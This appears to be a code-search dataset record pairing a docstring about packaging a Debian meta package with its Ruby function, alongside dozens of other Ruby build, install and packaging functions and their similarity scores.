find_links_url_args << target_args\n safesystem(*pip_args.flatten)\n\n if attributes[:virtualenv_setup_install?]\n logger.info(\"Running PACKAGE setup.py\")\n setup_args = [python_exe, \"setup.py\", \"install\"]\n safesystem(*setup_args.flatten)\n end\n\n if ! is_requirements_file && package_version.nil?\n frozen = safesystemout(python_exe, pip_exe, \"freeze\")\n frozen_version = frozen[/#{package}==[^=]+$/]\n package_version = frozen_version && frozen_version.split(\"==\")[1].chomp!\n self.version ||= package_version\n end\n\n ::Dir[build_path + \"/**/*\"].each do |f|\n if ! File.readable? f\n File.lchmod(File.stat(f).mode | 444)\n end\n end\n\n ::Dir.chdir(virtualenv_build_folder) do\n safesystem(\"virtualenv-tools\", \"--update-path\", virtualenv_folder)\n end\n\n if !attributes[:virtualenv_other_files_dir].nil?\n # Copy all files from other dir to build_path\n Find.find(attributes[:virtualenv_other_files_dir]) do |path|\n src = path.gsub(/^#{attributes[:virtualenv_other_files_dir]}/, '')\n dst = File.join(build_path, src)\n copy_entry(path, dst, preserve=true, remove_destination=true)\n copy_metadata(path, dst)\n end\n end\n\n remove_python_compiled_files virtualenv_build_folder\n\n # use dir to set stuff up properly, mainly so I don't have to reimplement\n # the chdir/prefix stuff special for tar.\n dir = convert(FPM::Package::Dir)\n # don't double prefix the files\n dir.attributes[:prefix] = nil\n if attributes[:chdir]\n dir.attributes[:chdir] = File.join(build_path, attributes[:chdir])\n else\n dir.attributes[:chdir] = build_path\n end\n\n cleanup_staging\n # Tell 'dir' to input \".\" and chdir/prefix will help it figure out the\n # rest.\n dir.input(\".\")\n @staging_path = dir.staging_path\n dir.cleanup_build\n\n end",
"def initialize_package\n self.need_tar ||= false\n self.need_zip ||= false\n end",
"def install\n pacman \"--noconfirm\", \"--noprogressbar\", \"-Sy\", @resource[:name]\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\"Could not find package %s\" % self.name)\n end\n end",
"def with_package_source(source_url, source_repos = [], options = {})\n source_prefix = options[:source] ? 'deb-src' : 'deb'\n source_patterns = [source_prefix, source_url] + source_repos \n \n source_contents = File.read '/etc/apt/sources.list'\n sources = source_contents.split(/(\\r|\\n)+/)\n source_exists = sources.any? do |source_line|\n source_frags = source_line.split(' ')\n source_patterns.all? { |pattern| source_frags.any? { |frag| frag == pattern } }\n end\n\n unless source_exists\n File.open('/etc/apt/sources.list', 'a') do |f|\n f.write \"#{source_prefix} #{source_url} #{source_repos.join(' ')}\\n\"\n end\n update_package_metadata\n end\n \n begin\n yield\n ensure\n unless source_exists\n File.open('/etc/apt/sources.list', 'w') { |f| f.write source_contents }\n update_package_metadata \n end\n end\n end",
"def install_custom!\n do_dmg_package_resource!\n end",
"def after_package_create(package)\n end",
"def after_package_create(package)\n end",
"def package(name)\n if name.respond_to? :cache_path\n name\n elsif @versions[name]\n Package.for(@sources[name], @versions[name], @files[name])\n end\n end",
"def install_package host, package_name, package_version = nil\n host.install_package package_name, '', package_version\n end",
"def packaging\n compiler && @compiler.class.packaging\n end",
"def add_bundle(sourcefile, params={})\n classname = File.basename(sourcefile, \".java\")\n pkgline = `grep ^package #{sourcefile}`\n if !pkgline or pkgline == \"\"\n raise \"the searcher file (#{sourcefile}) must contain a package declaration\"\n end\n pkgpath = pkgline.split()[1].chop;\n add_bundle_dir(sourcefile, pkgpath + \".\" + classname, params)\n end",
"def action_package(type)\n name = prompt('Name : ')\n dest = Automation::Converter.to_unix_path(prompt('Destination : '))\n require REQUIRE_MAP[type] % {name: name}\n\n raise Automation::ConsoleError.new(\"No definition found for package '#{name}'\") unless PACKAGE_CLASS.has_key?(name)\n plugin = PACKAGE_CLASS[name].new\n plugin.package(dest)\n puts \"Packaged '#{type}' - #{plugin.name}\"\n end",
"def package_by_name(package_name)\n raise RuntimeError, \"#{self.class} needs to overwrite package_by_name\"\n end",
"def package_from_name\n case name.downcase\n when 'splunk' then package :splunk\n when 'universal_forwarder' then package :universal_forwarder\n else raise 'Package must be specified (:splunk or :universal_forwarder)'\n end\n end",
"def upgrade_package(package_name, options = {})\n return install_package(package_name, options) if options[:source]\n \n return true if upgrade_package_impl(package_name, options)\n \n return false if options[:no_proxy]\n upgrade_package package_name, options.merge(:no_proxy => true)\n end",
"def package_project(source, dest)\n FileUtils.mkdir_p(dest)\n FileUtils.cp(File.join(source, BUILDFILE), File.join(dest, BUILDFILE))\n PACKAGE_FILES.each do |file|\n cp_if_exists(File.join(source, file), dest)\n end\n rules = @project_config.publish_rules.empty? ? PUBLISH_RULES : @project_config.publish_rules\n\n rules.each do |from, to|\n log.debug \"Processing rule #{from} => #{to}\"\n cp_if_exists(File.join(source, from), File.join(dest, to))\n end\n end",
"def pkg_install\n return if @install.count == 0\n\n sysprint \"#{@name} install\"\n\n if @install[:bsys_install] != nil\n if @bsdstyle == true\n FileUtils::cd(@srcdir)\n else\n FileUtils::cd(@objdir)\n end\n\n unless sysexec(@install[:bsys_install])\n syserr \"Failed to install package\"\n raise\n end\n\n FileUtils::cd(BSYS_ROOTDIR)\n\n @install.delete(:bsys_install)\n end\n\n @install.each_pair do |src, dst|\n dst = File::join($project_rootdir, dst)\n if File::directory? src\n FileUtils::mkdir_p dst\n continue\n end\n\n # Create directory if it doesn't exists\n FileUtils::mkdir_p dst[0..-(File::basename(dst).length + 1)]\n\n if File::executable? src\n FileUtils::install(src, dst, :mode => 0755)\n else\n FileUtils::install(src, dst, :mode => 0644)\n end\n end\n end",
"def define\n fail \"Version required (or :noversion)\" if @version.nil?\n @version = nil if :noversion == @version\n\n desc \"Build all the packages\"\n task :package\n\n desc \"Force a rebuild of the package files\"\n task repackage: [:clobber_package, :package]\n\n desc \"Remove package products\"\n task :clobber_package do\n rm_r package_dir rescue nil\n end\n\n task clobber: [:clobber_package]\n\n [\n [need_tar, tgz_file, \"z\"],\n [need_tar_gz, tar_gz_file, \"z\"],\n [need_tar_bz2, tar_bz2_file, \"j\"],\n [need_tar_xz, tar_xz_file, \"J\"]\n ].each do |need, file, flag|\n if need\n task package: [\"#{package_dir}/#{file}\"]\n file \"#{package_dir}/#{file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @tar_command, \"#{flag}cvf\", file, target_dir }\n mv \"#{package_dir_path}/#{target_dir}\", package_dir if without_parent_dir\n end\n end\n end\n\n if need_zip\n task package: [\"#{package_dir}/#{zip_file}\"]\n file \"#{package_dir}/#{zip_file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @zip_command, \"-r\", zip_file, target_dir }\n mv \"#{package_dir_path}/#{zip_file}\", package_dir if without_parent_dir\n end\n end\n\n directory package_dir_path => @package_files do\n @package_files.each do |fn|\n f = File.join(package_dir_path, fn)\n fdir = File.dirname(f)\n mkdir_p(fdir) unless File.exist?(fdir)\n if File.directory?(fn)\n mkdir_p(f)\n else\n rm_f f\n safe_ln(fn, f)\n end\n end\n end\n self\n end",
"def preinst\n @package.get_script :preinst\n end",
"def run_package_for_missing(bundle_info)\n puts 'Packaging dependencies missing for current platform'\n\n $usePrecompiled = true\n\n puts 'Making sure databases are loaded...'\n databases = getDefaultDatabases\n\n if databases\n success 'Databases loaded'\n else\n onError 'database loading failed'\n end\n\n to_package = []\n\n all_dependencies.each do |dep|\n puts \"Checking dependency: #{dep.Name}\"\n\n precompiled = getSupportedPrecompiledPackage dep\n\n next if precompiled\n\n puts 'No precompiled available. Creating package'\n\n to_package.append dep\n end\n\n if to_package.empty?\n success 'No missing precompiled dependencies found'\n return\n end\n\n package_dependencies to_package, bundle_info\nend",
"def install(pkg_name)\n begin\n pkg_build_dir = packaging_dir(pkg_name)\n filepath = Dir.glob(\"#{pkg_build_dir}/*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file found for #{pkg_name} in #{pkg_build_dir}: #{filepath}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{pkg_build_dir}: #{filepath}\"\n else\n filepath = filepath.first\n Packager.info \"Found package: #{filepath}\"\n end\n install_debfile(filepath)\n rescue Exception => e\n raise RuntimeError, \"Installation of package '#{pkg_name} failed -- #{e}\"\n end\n end",
"def load_package_manifest(pkg)\n if pkg.respond_to?(:to_str)\n pkg_definition = find_package_definition(pkg)\n unless pkg_definition\n raise ArgumentError, \"#{pkg} is not a known package in #{self}\"\n end\n\n pkg = pkg_definition\n end\n package = pkg.autobuild\n package_set = pkg.package_set\n\n # Look for the package's manifest.xml, but fallback to a manifest in\n # the package set if present\n if package.use_package_xml? && package.checked_out?\n manifest_path = File.join(package.srcdir, \"package.xml\")\n raise NoPackageXML.new(package.srcdir), \"#{package.name} from \"\\\n \"#{package_set.name} has use_package_xml set, but the package has \"\\\n \"no package.xml file\" unless File.file?(manifest_path)\n\n manifest = PackageManifest.load(package, manifest_path,\n ros_manifest: true,\n condition_context: @ws.env)\n else\n manifest_paths = [File.join(package.srcdir, \"manifest.xml\")]\n if package_set.local_dir\n manifest_paths << File.join(\n package_set.local_dir, \"manifests\", \"#{package.name}.xml\"\n )\n end\n manifest_path = manifest_paths.find do |path|\n File.file?(path)\n end\n if manifest_path\n manifest = PackageManifest.load(package, manifest_path,\n ros_manifest: false,\n condition_context: @ws.config)\n end\n end\n\n if manifest\n pkg.autobuild.description = manifest\n else\n Autoproj.warn \"#{package.name} from #{package_set.name} \"\\\n \"does not have a manifest\"\n end\n\n pkg.apply_dependencies_from_manifest\n # #description is initialized with a null package manifest\n # return it even if we haven't overriden it\n pkg.autobuild.description\n end",
"def generate_package\n if @language_package_service.autograded?\n new_package = @language_package_service.generate_package(@question.attachment)\n @question.file = new_package if new_package.present?\n else\n templates = @language_package_service.submission_templates\n @question.imported_attachment = nil\n @question.import_job_id = nil\n @question.non_autograded_template_files = templates.map do |template|\n Course::Assessment::Question::ProgrammingTemplateFile.new(template)\n end\n end\n end",
"def copy_package(package, package_path)\n repository_path = File.join(@git_resolver.repository_path(package), '.')\n\n FileUtils.mkdir_p(package_path)\n FileUtils.cp_r(repository_path, package_path)\n FileUtils.rm_rf(File.join(package_path, '.git'))\n end",
"def set_package_filename\n if @package_name.nil?\n @package_name = get_package_name\n end\n end",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def compile_package_task(input, output=input)\n js_tasks = SproutCore::Compiler::Preprocessors::JavaScriptTask.with_input \"packages/#{input}/lib/**/*.js\", \".\"\n SproutCore::Compiler::CombineTask.with_tasks js_tasks, \"#{SproutCore::Compiler.intermediate}/#{output}\"\nend",
"def compile_package_task(input, output=input)\n js_tasks = SproutCore::Compiler::Preprocessors::JavaScriptTask.with_input \"packages/#{input}/lib/**/*.js\", \".\"\n SproutCore::Compiler::CombineTask.with_tasks js_tasks, \"#{SproutCore::Compiler.intermediate}/#{output}\"\nend",
"def fetch_and_deploy_from local_filename\n if local_filename.end_with?('.tsv')\n logger.info \"Deploying contents of config file: #{local_filename}\"\n process_config_file local_filename\n\n elsif local_filename.end_with?('.gz')\n Chef::Log.info \"Deploying R package: #{local_filename}\"\n execute \"install custom R package #{local_filename}\" do\n command \"R CMD INSTALL #{local_filename}\"\n end\n\n elsif local_filename.end_with?('.deb')\n Chef::Log.info \"Deploying Debian package: #{local_filename}\"\n package_base = Regexp.new(\".*/([^/]+)_([^_/]+)\\.deb$\").match(local_filename)[1]\n dpkg_package \"#{package_base}\" do\n action :install\n source local_filename\n end\n end\n end",
"def install\n bin.install \"#{PACKAGE_NAME}\"\n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def add_packaged_app(&block)\n raise Tay::InvalidSpecification.new('Packaged app already set up') if @packaged_app\n @packaged_app = PackagedApp.new\n yield @packaged_app\n end",
"def metapackage(name, *packages)\n Autoproj.workspace.manifest.metapackage(name, *packages)\nend",
"def package(name, paths=[])\n Package.new(name, paths, self)\n end",
"def import(package)\n srcdir = package.srcdir\n if File.directory?(srcdir)\n package.isolate_errors(false) do\n if Autobuild.do_update\n perform_update(package)\n else\n if Autobuild.verbose\n puts \" not updating #{package.name}\"\n end\n return\n end\n end\n\n elsif File.exists?(srcdir)\n raise ConfigException, \"#{srcdir} exists but is not a directory\"\n else\n perform_checkout(package)\n end\n end",
"def package_if_necessary(pkg)\n if !package_is_installed?(pkg)\n banner \"#{pkg}...\"\n run \"apt-get -y install #{pkg}\"\n end\n end",
"def package(group_name, package_name, package_version)\n RubyAem::Resources::Package.new(@client, group_name, package_name, package_version)\n end",
"def register_package_set(pkg_set)\n invalidate_ignored_package_names\n metapackage(pkg_set.name)\n metapackage(\"#{pkg_set.name}.all\")\n @package_sets << pkg_set\n end",
"def build(chroot,dirs,task,add_to_autoreq=true,snapshot_release=false)\n validate_in_mock_group?\n _verbose = ENV.fetch('SIMP_PKG_verbose','no') == 'yes'\n\n # Default package metadata for reference\n default_metadata = YAML.load(File.read(\"#{@src_dir}/build/package_metadata_defaults.yaml\"))\n\n metadata = Parallel.map(\n # Allow for shell globs\n Array(dirs),\n :in_processes => get_cpu_limit,\n :progress => task.name\n ) do |dir|\n result = []\n\n fail(\"Could not find directory #{dir}\") unless Dir.exist?(dir)\n\n Dir.chdir(dir) do\n built_rpm = false\n unique_build = (get_cpu_limit != 1).to_s\n\n if _verbose\n $stderr.puts(\"Running 'rake pkg:rpm' on #{File.basename(dir)}\")\n end\n\n # We're building a module, override anything down there\n if File.exist?('metadata.json')\n unique_namespace = (0...24).map{ (65 + rand(26)).chr }.join.downcase\n\n Simp::Rake::Pkg.new(Dir.pwd, nil, unique_namespace, @simp_version)\n\n Rake::Task[\"#{unique_namespace}:pkg:rpm\"].invoke(chroot, unique_build, snapshot_release)\n\n built_rpm = true\n\n # We're building one of the extra assets and should honor its Rakefile\n elsif File.exist?('Rakefile')\n\n rake_flags = Rake.application.options.trace ? '--trace' : ''\n\n cmd = %{SIMP_BUILD_version=#{@simp_version} rake pkg:rpm[#{chroot},#{unique_build},#{snapshot_release}] #{rake_flags} 2>&1}\n\n build_success = true\n begin\n ::Bundler.with_clean_env do\n %x{#{cmd}}\n build_success = $?.success?\n end\n\n built_rpm = true\n rescue\n build_success = false\n end\n\n unless build_success\n if _verbose\n $stderr.puts(\"First 'rake pkg:rpm' attempt failed, running bundle and trying again.\")\n end\n\n ::Bundler.with_clean_env do\n %x{bundle install --with development}\n %x{#{cmd}}\n end\n end\n else\n puts \"Warning: '#{dir}' could not be built via Rake\"\n end\n\n if built_rpm\n tarballs = Dir.glob('dist/*.tar.gz')\n srpms = Dir.glob('dist/*.src.rpm')\n rpms = (Dir.glob('dist/*.rpm') - srpms)\n\n # Not all items generate tarballs\n tarballs.each do |pkg|\n if (File.stat(pkg).size == 0)\n raise(\"Empty Tarball '#{pkg}' generated for #{dir}\")\n end\n end\n raise(\"No SRPMs generated for #{dir}\") if srpms.empty?\n raise(\"No RPMs generated for #{dir}\") if rpms.empty?\n\n last_build = {\n 'git_hash' => %x{git show-ref --head HEAD}.chomp,\n 'rpms' => {}\n }\n\n # Glob all generated rpms, and add their metadata to a result array.\n rpms.each do |rpm|\n # get_info from each generated rpm, not the spec file, so macros in the\n # metadata have already been resolved in the mock chroot.\n metadata = Simp::RPM.get_info(rpm)\n\n if File.exist?('build/package_metadata.yaml')\n metadata.merge!(YAML.load_file('build/package_metadata.yaml'))\n end\n\n rpm_stat = File.stat(rpm)\n\n last_build['rpms'][rpm] = {\n 'metadata' => metadata,\n 'size' => rpm_stat.size\n }\n\n result << metadata\n end\n\n File.open('dist/.last_build_metadata', 'w') do |fh|\n fh.puts(last_build.to_yaml)\n end\n end\n\n if _verbose\n $stderr.puts(\"Finshed 'rake pkg:rpm' on #{File.basename(dir)}\")\n end\n end\n\n result\n end\n\n metadata.each do |mod|\n # Each module could generate multiple rpms, each with its own metadata.\n # Iterate over them to add all built rpms to autorequires.\n mod.each do |module_pkginfo|\n next unless (module_pkginfo && module_pkginfo.is_a?(Hash))\n\n # Set up the autorequires\n if add_to_autoreq\n # Register the package with the autorequires\n mode = 'r+'\n mode = 'w+' unless File.exist?(\"#{@src_dir}/build/autorequires\")\n autoreq_fh = File.open(\"#{@src_dir}/build/autorequires\",mode)\n\n begin\n # Reads the autorequires file, then empties it\n autorequires = []\n autorequires += autoreq_fh.read.split(\"\\n\")\n autoreq_fh.rewind\n autoreq_fh.truncate(0)\n\n # The SIMP Rakefile expects the autorequires to be in this format.\n autorequires << \"#{module_pkginfo[:name]} #{module_pkginfo[:version]} #{module_pkginfo[:release]}\"\n autoreq_fh.puts(autorequires.sort.uniq.join(\"\\n\"))\n ensure\n autoreq_fh.flush\n autoreq_fh.close\n end\n end\n end\n end\n end",
"def install!\n include_recipe 'zypper'\n super\n end",
"def solaris_install_local_package(package_path, noask_directory = nil)\n variant, version, arch, codename = self['platform'].to_array\n\n version = version.split('.')[0] # packages are only published for major versions\n\n error_message = nil\n unless variant == 'solaris'\n error_message = \"Can not call solaris_install_local_package for the \"\n error_message << \"non-solaris platform '#{variant}'\"\n end\n if version != '10' && version != '11'\n error_message = \"Solaris #{version} is not supported by the method \"\n error_message << 'solaris_install_local_package'\n end\n raise ArgumentError, error_message if error_message\n\n if version == '10'\n noask_text = self.noask_file_text\n create_remote_file self, File.join(noask_directory, 'noask'), noask_text\n\n install_cmd = \"gunzip -c #{package_path} | pkgadd -d /dev/stdin -a noask -n all\"\n elsif version == '11'\n install_cmd = \"pkg install -g #{package_path} puppet-agent\"\n end\n self.exec(Beaker::Command.new(install_cmd))\n end",
"def run_package_installation_test(hash)\n # Turn the hash into a package\n if files = hash[:files]\n hash.delete(:files)\n if files.is_a?(Array)\n hash[:source] = files.shift\n else\n hash[:source] = files\n files = []\n end\n else\n files = []\n end\n\n if versions = hash[:versions]\n hash.delete(:versions)\n else\n versions = []\n end\n\n # Start out by just making sure it's installed\n if versions.empty?\n hash[:ensure] = :present\n else\n hash[:ensure] = versions.shift\n end\n\n if hash[:source]\n unless FileTest.exists?(hash[:source])\n $stderr.puts \"Create a package at #{hash[:source]} for testing\"\n return\n end\n end\n\n if cleancmd = hash[:cleanup]\n hash.delete(:cleanup)\n end\n\n pkg = nil\n assert_nothing_raised(\n \"Could not turn #{hash.inspect} into a package\"\n ) do\n pkg = Puppet::Type.newpackage(hash)\n end\n\n # Make any necessary modifications.\n modpkg(pkg)\n\n provider = pkg.provider\n\n assert(provider, \"Could not retrieve provider\")\n\n return if result = provider.query and ! [:absent, :purged].include?(result[:ensure])\n\n assert_absent(provider)\n\n if Process.uid != 0\n Puppet.info \"Run as root for full package tests\"\n return\n end\n\n cleanup do\n if pkg.provider.respond_to?(:uninstall)\n pkg.provider.flush\n if pkg.provider.properties[:ensure] != :absent\n assert_nothing_raised(\"Could not clean up package\") do\n pkg.provider.uninstall\n end\n end\n else\n system(cleancmd) if cleancmd\n end\n end\n\n # Now call 'latest' after the package is installed\n if provider.respond_to?(:latest)\n assert_nothing_raised(\"Could not call 'latest'\") do\n provider.latest\n end\n end\n\n assert_nothing_raised(\"Could not install package\") do\n provider.install\n end\n\n assert_not_absent(provider, \"package did not install\")\n\n # If there are any remaining files, then test upgrading from there\n unless files.empty?\n pkg[:source] = files.shift\n current = provider.properties\n assert_nothing_raised(\"Could not upgrade\") do\n provider.update\n end\n provider.flush\n new = provider.properties\n assert(current != new, \"package was not upgraded: #{current.inspect} did not change\")\n end\n\n unless versions.empty?\n pkg[:ensure] = versions.shift\n current = provider.properties\n assert_nothing_raised(\"Could not upgrade\") do\n provider.update\n end\n provider.flush\n new = provider.properties\n assert(current != new, \"package was not upgraded: #{current.inspect} did not change\")\n end\n\n # Now call 'latest' after the package is installed\n if provider.respond_to?(:latest)\n assert_nothing_raised(\"Could not call 'latest'\") do\n provider.latest\n end\n end\n\n # Now remove the package\n if provider.respond_to?(:uninstall)\n assert_nothing_raised do\n provider.uninstall\n end\n\n assert_absent(provider)\n end\n end",
"def install_packages(app)\n\n `installer -pkg \"#{app}\" -target /`\n\nend",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def build_package_tasks(config)\n # The name of the task to build the package\n package_task_name = \"build_#{config[:package_name]}\"\n\n # Add task name to the list of dependencies for the :deb_packages task\n task :deb_packages => package_task_name\n\n # The path to the package source directory\n pkg_src_dir = File.join(PACKAGE_CONSTRUCTION_DIR, source_dir_name(config))\n\n # Directory task to ensure the existence of the directory\n directory pkg_src_dir\n\n # Create the tarball task\n orig_source_tarball_path = File.join(PACKAGE_CONSTRUCTION_DIR, \"#{orig_tar_ball_name(config)}.orig.tar.gz\")\n\n # The File task to construct the original source tarball.\n file orig_source_tarball_path => PACKAGE_CONSTRUCTION_DIR do\n system \"tar zcf #{orig_source_tarball_path} --directory #{PACKAGE_CONSTRUCTION_DIR} #{source_dir_name(config)}\"\n end\n\n # The path to the debian directory within the extracted source directory\n package_debian_path = File.join(pkg_src_dir, 'debian')\n\n # Directory task to the package debian path to ensure existence.\n directory package_debian_path\n\n # The task that actually constructs the debian package\n task package_task_name => orig_source_tarball_path do\n # Build the spanky little thing.\n debuild_flag = ENV['debuild'] || 'true'\n if debuild_flag == 'true'\n system \"cd #{pkg_src_dir}; debuild -us -uc\"\n else\n puts \"Skipping build; debug flag was set\"\n end\n end\n\n # Ensure we have set up the tasks for all the files to be included\n # in the package.\n config[:exes].each do | exe_name |\n exe_path = File.join(pkg_src_dir, exe_name.split('.').first)\n file exe_path => pkg_src_dir do\n cp exe_name, exe_path\n end\n\n # Add the file path as a dependency of the source tarball\n task orig_source_tarball_path => exe_path\n end\n\n # Create the task to populate the debian directory\n debian_task = \"populate_#{config[:package_name]}_debian_files\"\n task debian_task => package_debian_path do\n cp_r \"package_source/#{config[:package_name]}/debian\", pkg_src_dir\n end\n\n # Finally add the debian task as a dependency for the package task.\n task package_task_name => debian_task\nend"
] | [
"0.67403233",
"0.6588731",
"0.6479387",
"0.64547145",
"0.6374927",
"0.63533336",
"0.6345991",
"0.6284882",
"0.6275911",
"0.6258917",
"0.6255152",
"0.62313044",
"0.6127586",
"0.60981727",
"0.60876894",
"0.6075155",
"0.6019445",
"0.60131645",
"0.6012386",
"0.6005589",
"0.59925354",
"0.598323",
"0.5958461",
"0.5953497",
"0.59472716",
"0.5946499",
"0.5946499",
"0.5937773",
"0.5908378",
"0.58981377",
"0.58977807",
"0.584224",
"0.5818885",
"0.57706636",
"0.57697517",
"0.5767181",
"0.57662034",
"0.57551885",
"0.57523924",
"0.5738916",
"0.57187814",
"0.5716911",
"0.57095456",
"0.5707998",
"0.5706092",
"0.56980324",
"0.569795",
"0.56874716",
"0.5679009",
"0.56729686",
"0.5667155",
"0.56608903",
"0.565118",
"0.56499326",
"0.564815",
"0.56474227",
"0.5647127",
"0.56398004",
"0.5638373",
"0.56251585",
"0.5615332",
"0.5615332",
"0.56121695",
"0.5611838",
"0.5610157",
"0.5602549",
"0.5598671",
"0.5594562",
"0.5568986",
"0.5563465",
"0.55597645",
"0.5552235",
"0.55508703",
"0.55485547",
"0.5535426",
"0.5533443",
"0.55298537",
"0.5526186",
"0.5517258",
"0.5491386",
"0.5488786",
"0.5479365",
"0.5479365",
"0.54671293",
"0.5462911",
"0.54582983",
"0.5452689",
"0.5446991",
"0.5441864",
"0.54397714",
"0.5438533",
"0.543769",
"0.54330707",
"0.5432998",
"0.5426078",
"0.54258835",
"0.5423899",
"0.542253",
"0.5417488",
"0.5414257"
] | 0.61835426 | 12 |
Package the given meta package if an existing source directory is given this will be used for packaging, otherwise the package will be bootstrapped | def package_meta(name, depend,
version: "0.1",
force_update: false,
distribution: nil,
architecture: nil)
debian_pkg_name = debian_meta_name(name)
if force_update
dirname = packaging_dir(debian_pkg_name)
if File.directory?(dirname)
Packager.info "Debian: rebuild requested -- removing #{dirname}"
FileUtils.rm_rf(dirname)
end
end
distribution ||= target_platform.distribution_release_name
architecture ||= target_platform.architecture
packaging_dir = packaging_dir(debian_pkg_name)
if not File.directory?(packaging_dir)
FileUtils.mkdir_p packaging_dir
end
package_deb_meta(name, depend,
version: version,
distribution: distribution,
packaging_dir: packaging_dir)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def package\n unless @package\n @package = package_resource_class.new(download_dest, run_context)\n tailor_package_to_platform\n end\n @package\n end",
"def source_package(options)\n package_common(options) do |pkg|\n pkg.srcdir = pkg.name\n yield(pkg) if block_given?\n end\nend",
"def package(output_dir = Pathname(Dir.pwd).expand_path)\n # Check the source\n check_source!\n # Turn the source into component parts to build a gem out of\n gem_parts = read_source_parts\n # Write these parts to a directory\n gem_dir = write_gem_dir(gem_parts)\n # Build a .gem file from this directory, and leave it in the `output_dir`\n build_package(gem_dir, output_dir)\n end",
"def package_plugin(name)\n `cd #{@repository_path}; rake feather:package path=#{name} target=#{@build_path}`\n end",
"def install_package(target_package_path); raise NotImplementedError; end",
"def setup_package(package_name, &block)\n if !block\n raise ConfigError.new, \"you must give a block to #setup_package\"\n end\n\n package_definition = Autoproj.workspace.manifest.package(package_name)\n if !package_definition\n raise ConfigError.new, \"#{package_name} is not a known package\"\n elsif package_definition.autobuild.kind_of?(Autobuild::DummyPackage)\n # Nothing to do!\n else\n package_definition.add_setup_block(block)\n end\nend",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def bundle_package(*args, &block)\n ruby_package(*args) do |pkg|\n Autoproj.env_add_path 'ROCK_BUNDLE_PATH', pkg.srcdir\n if block_given?\n pkg.instance_eval(&block)\n end\n end\nend",
"def build\n @model.custom_package? ? custom_package : standard_package\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def install_custom!\n package package_name do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
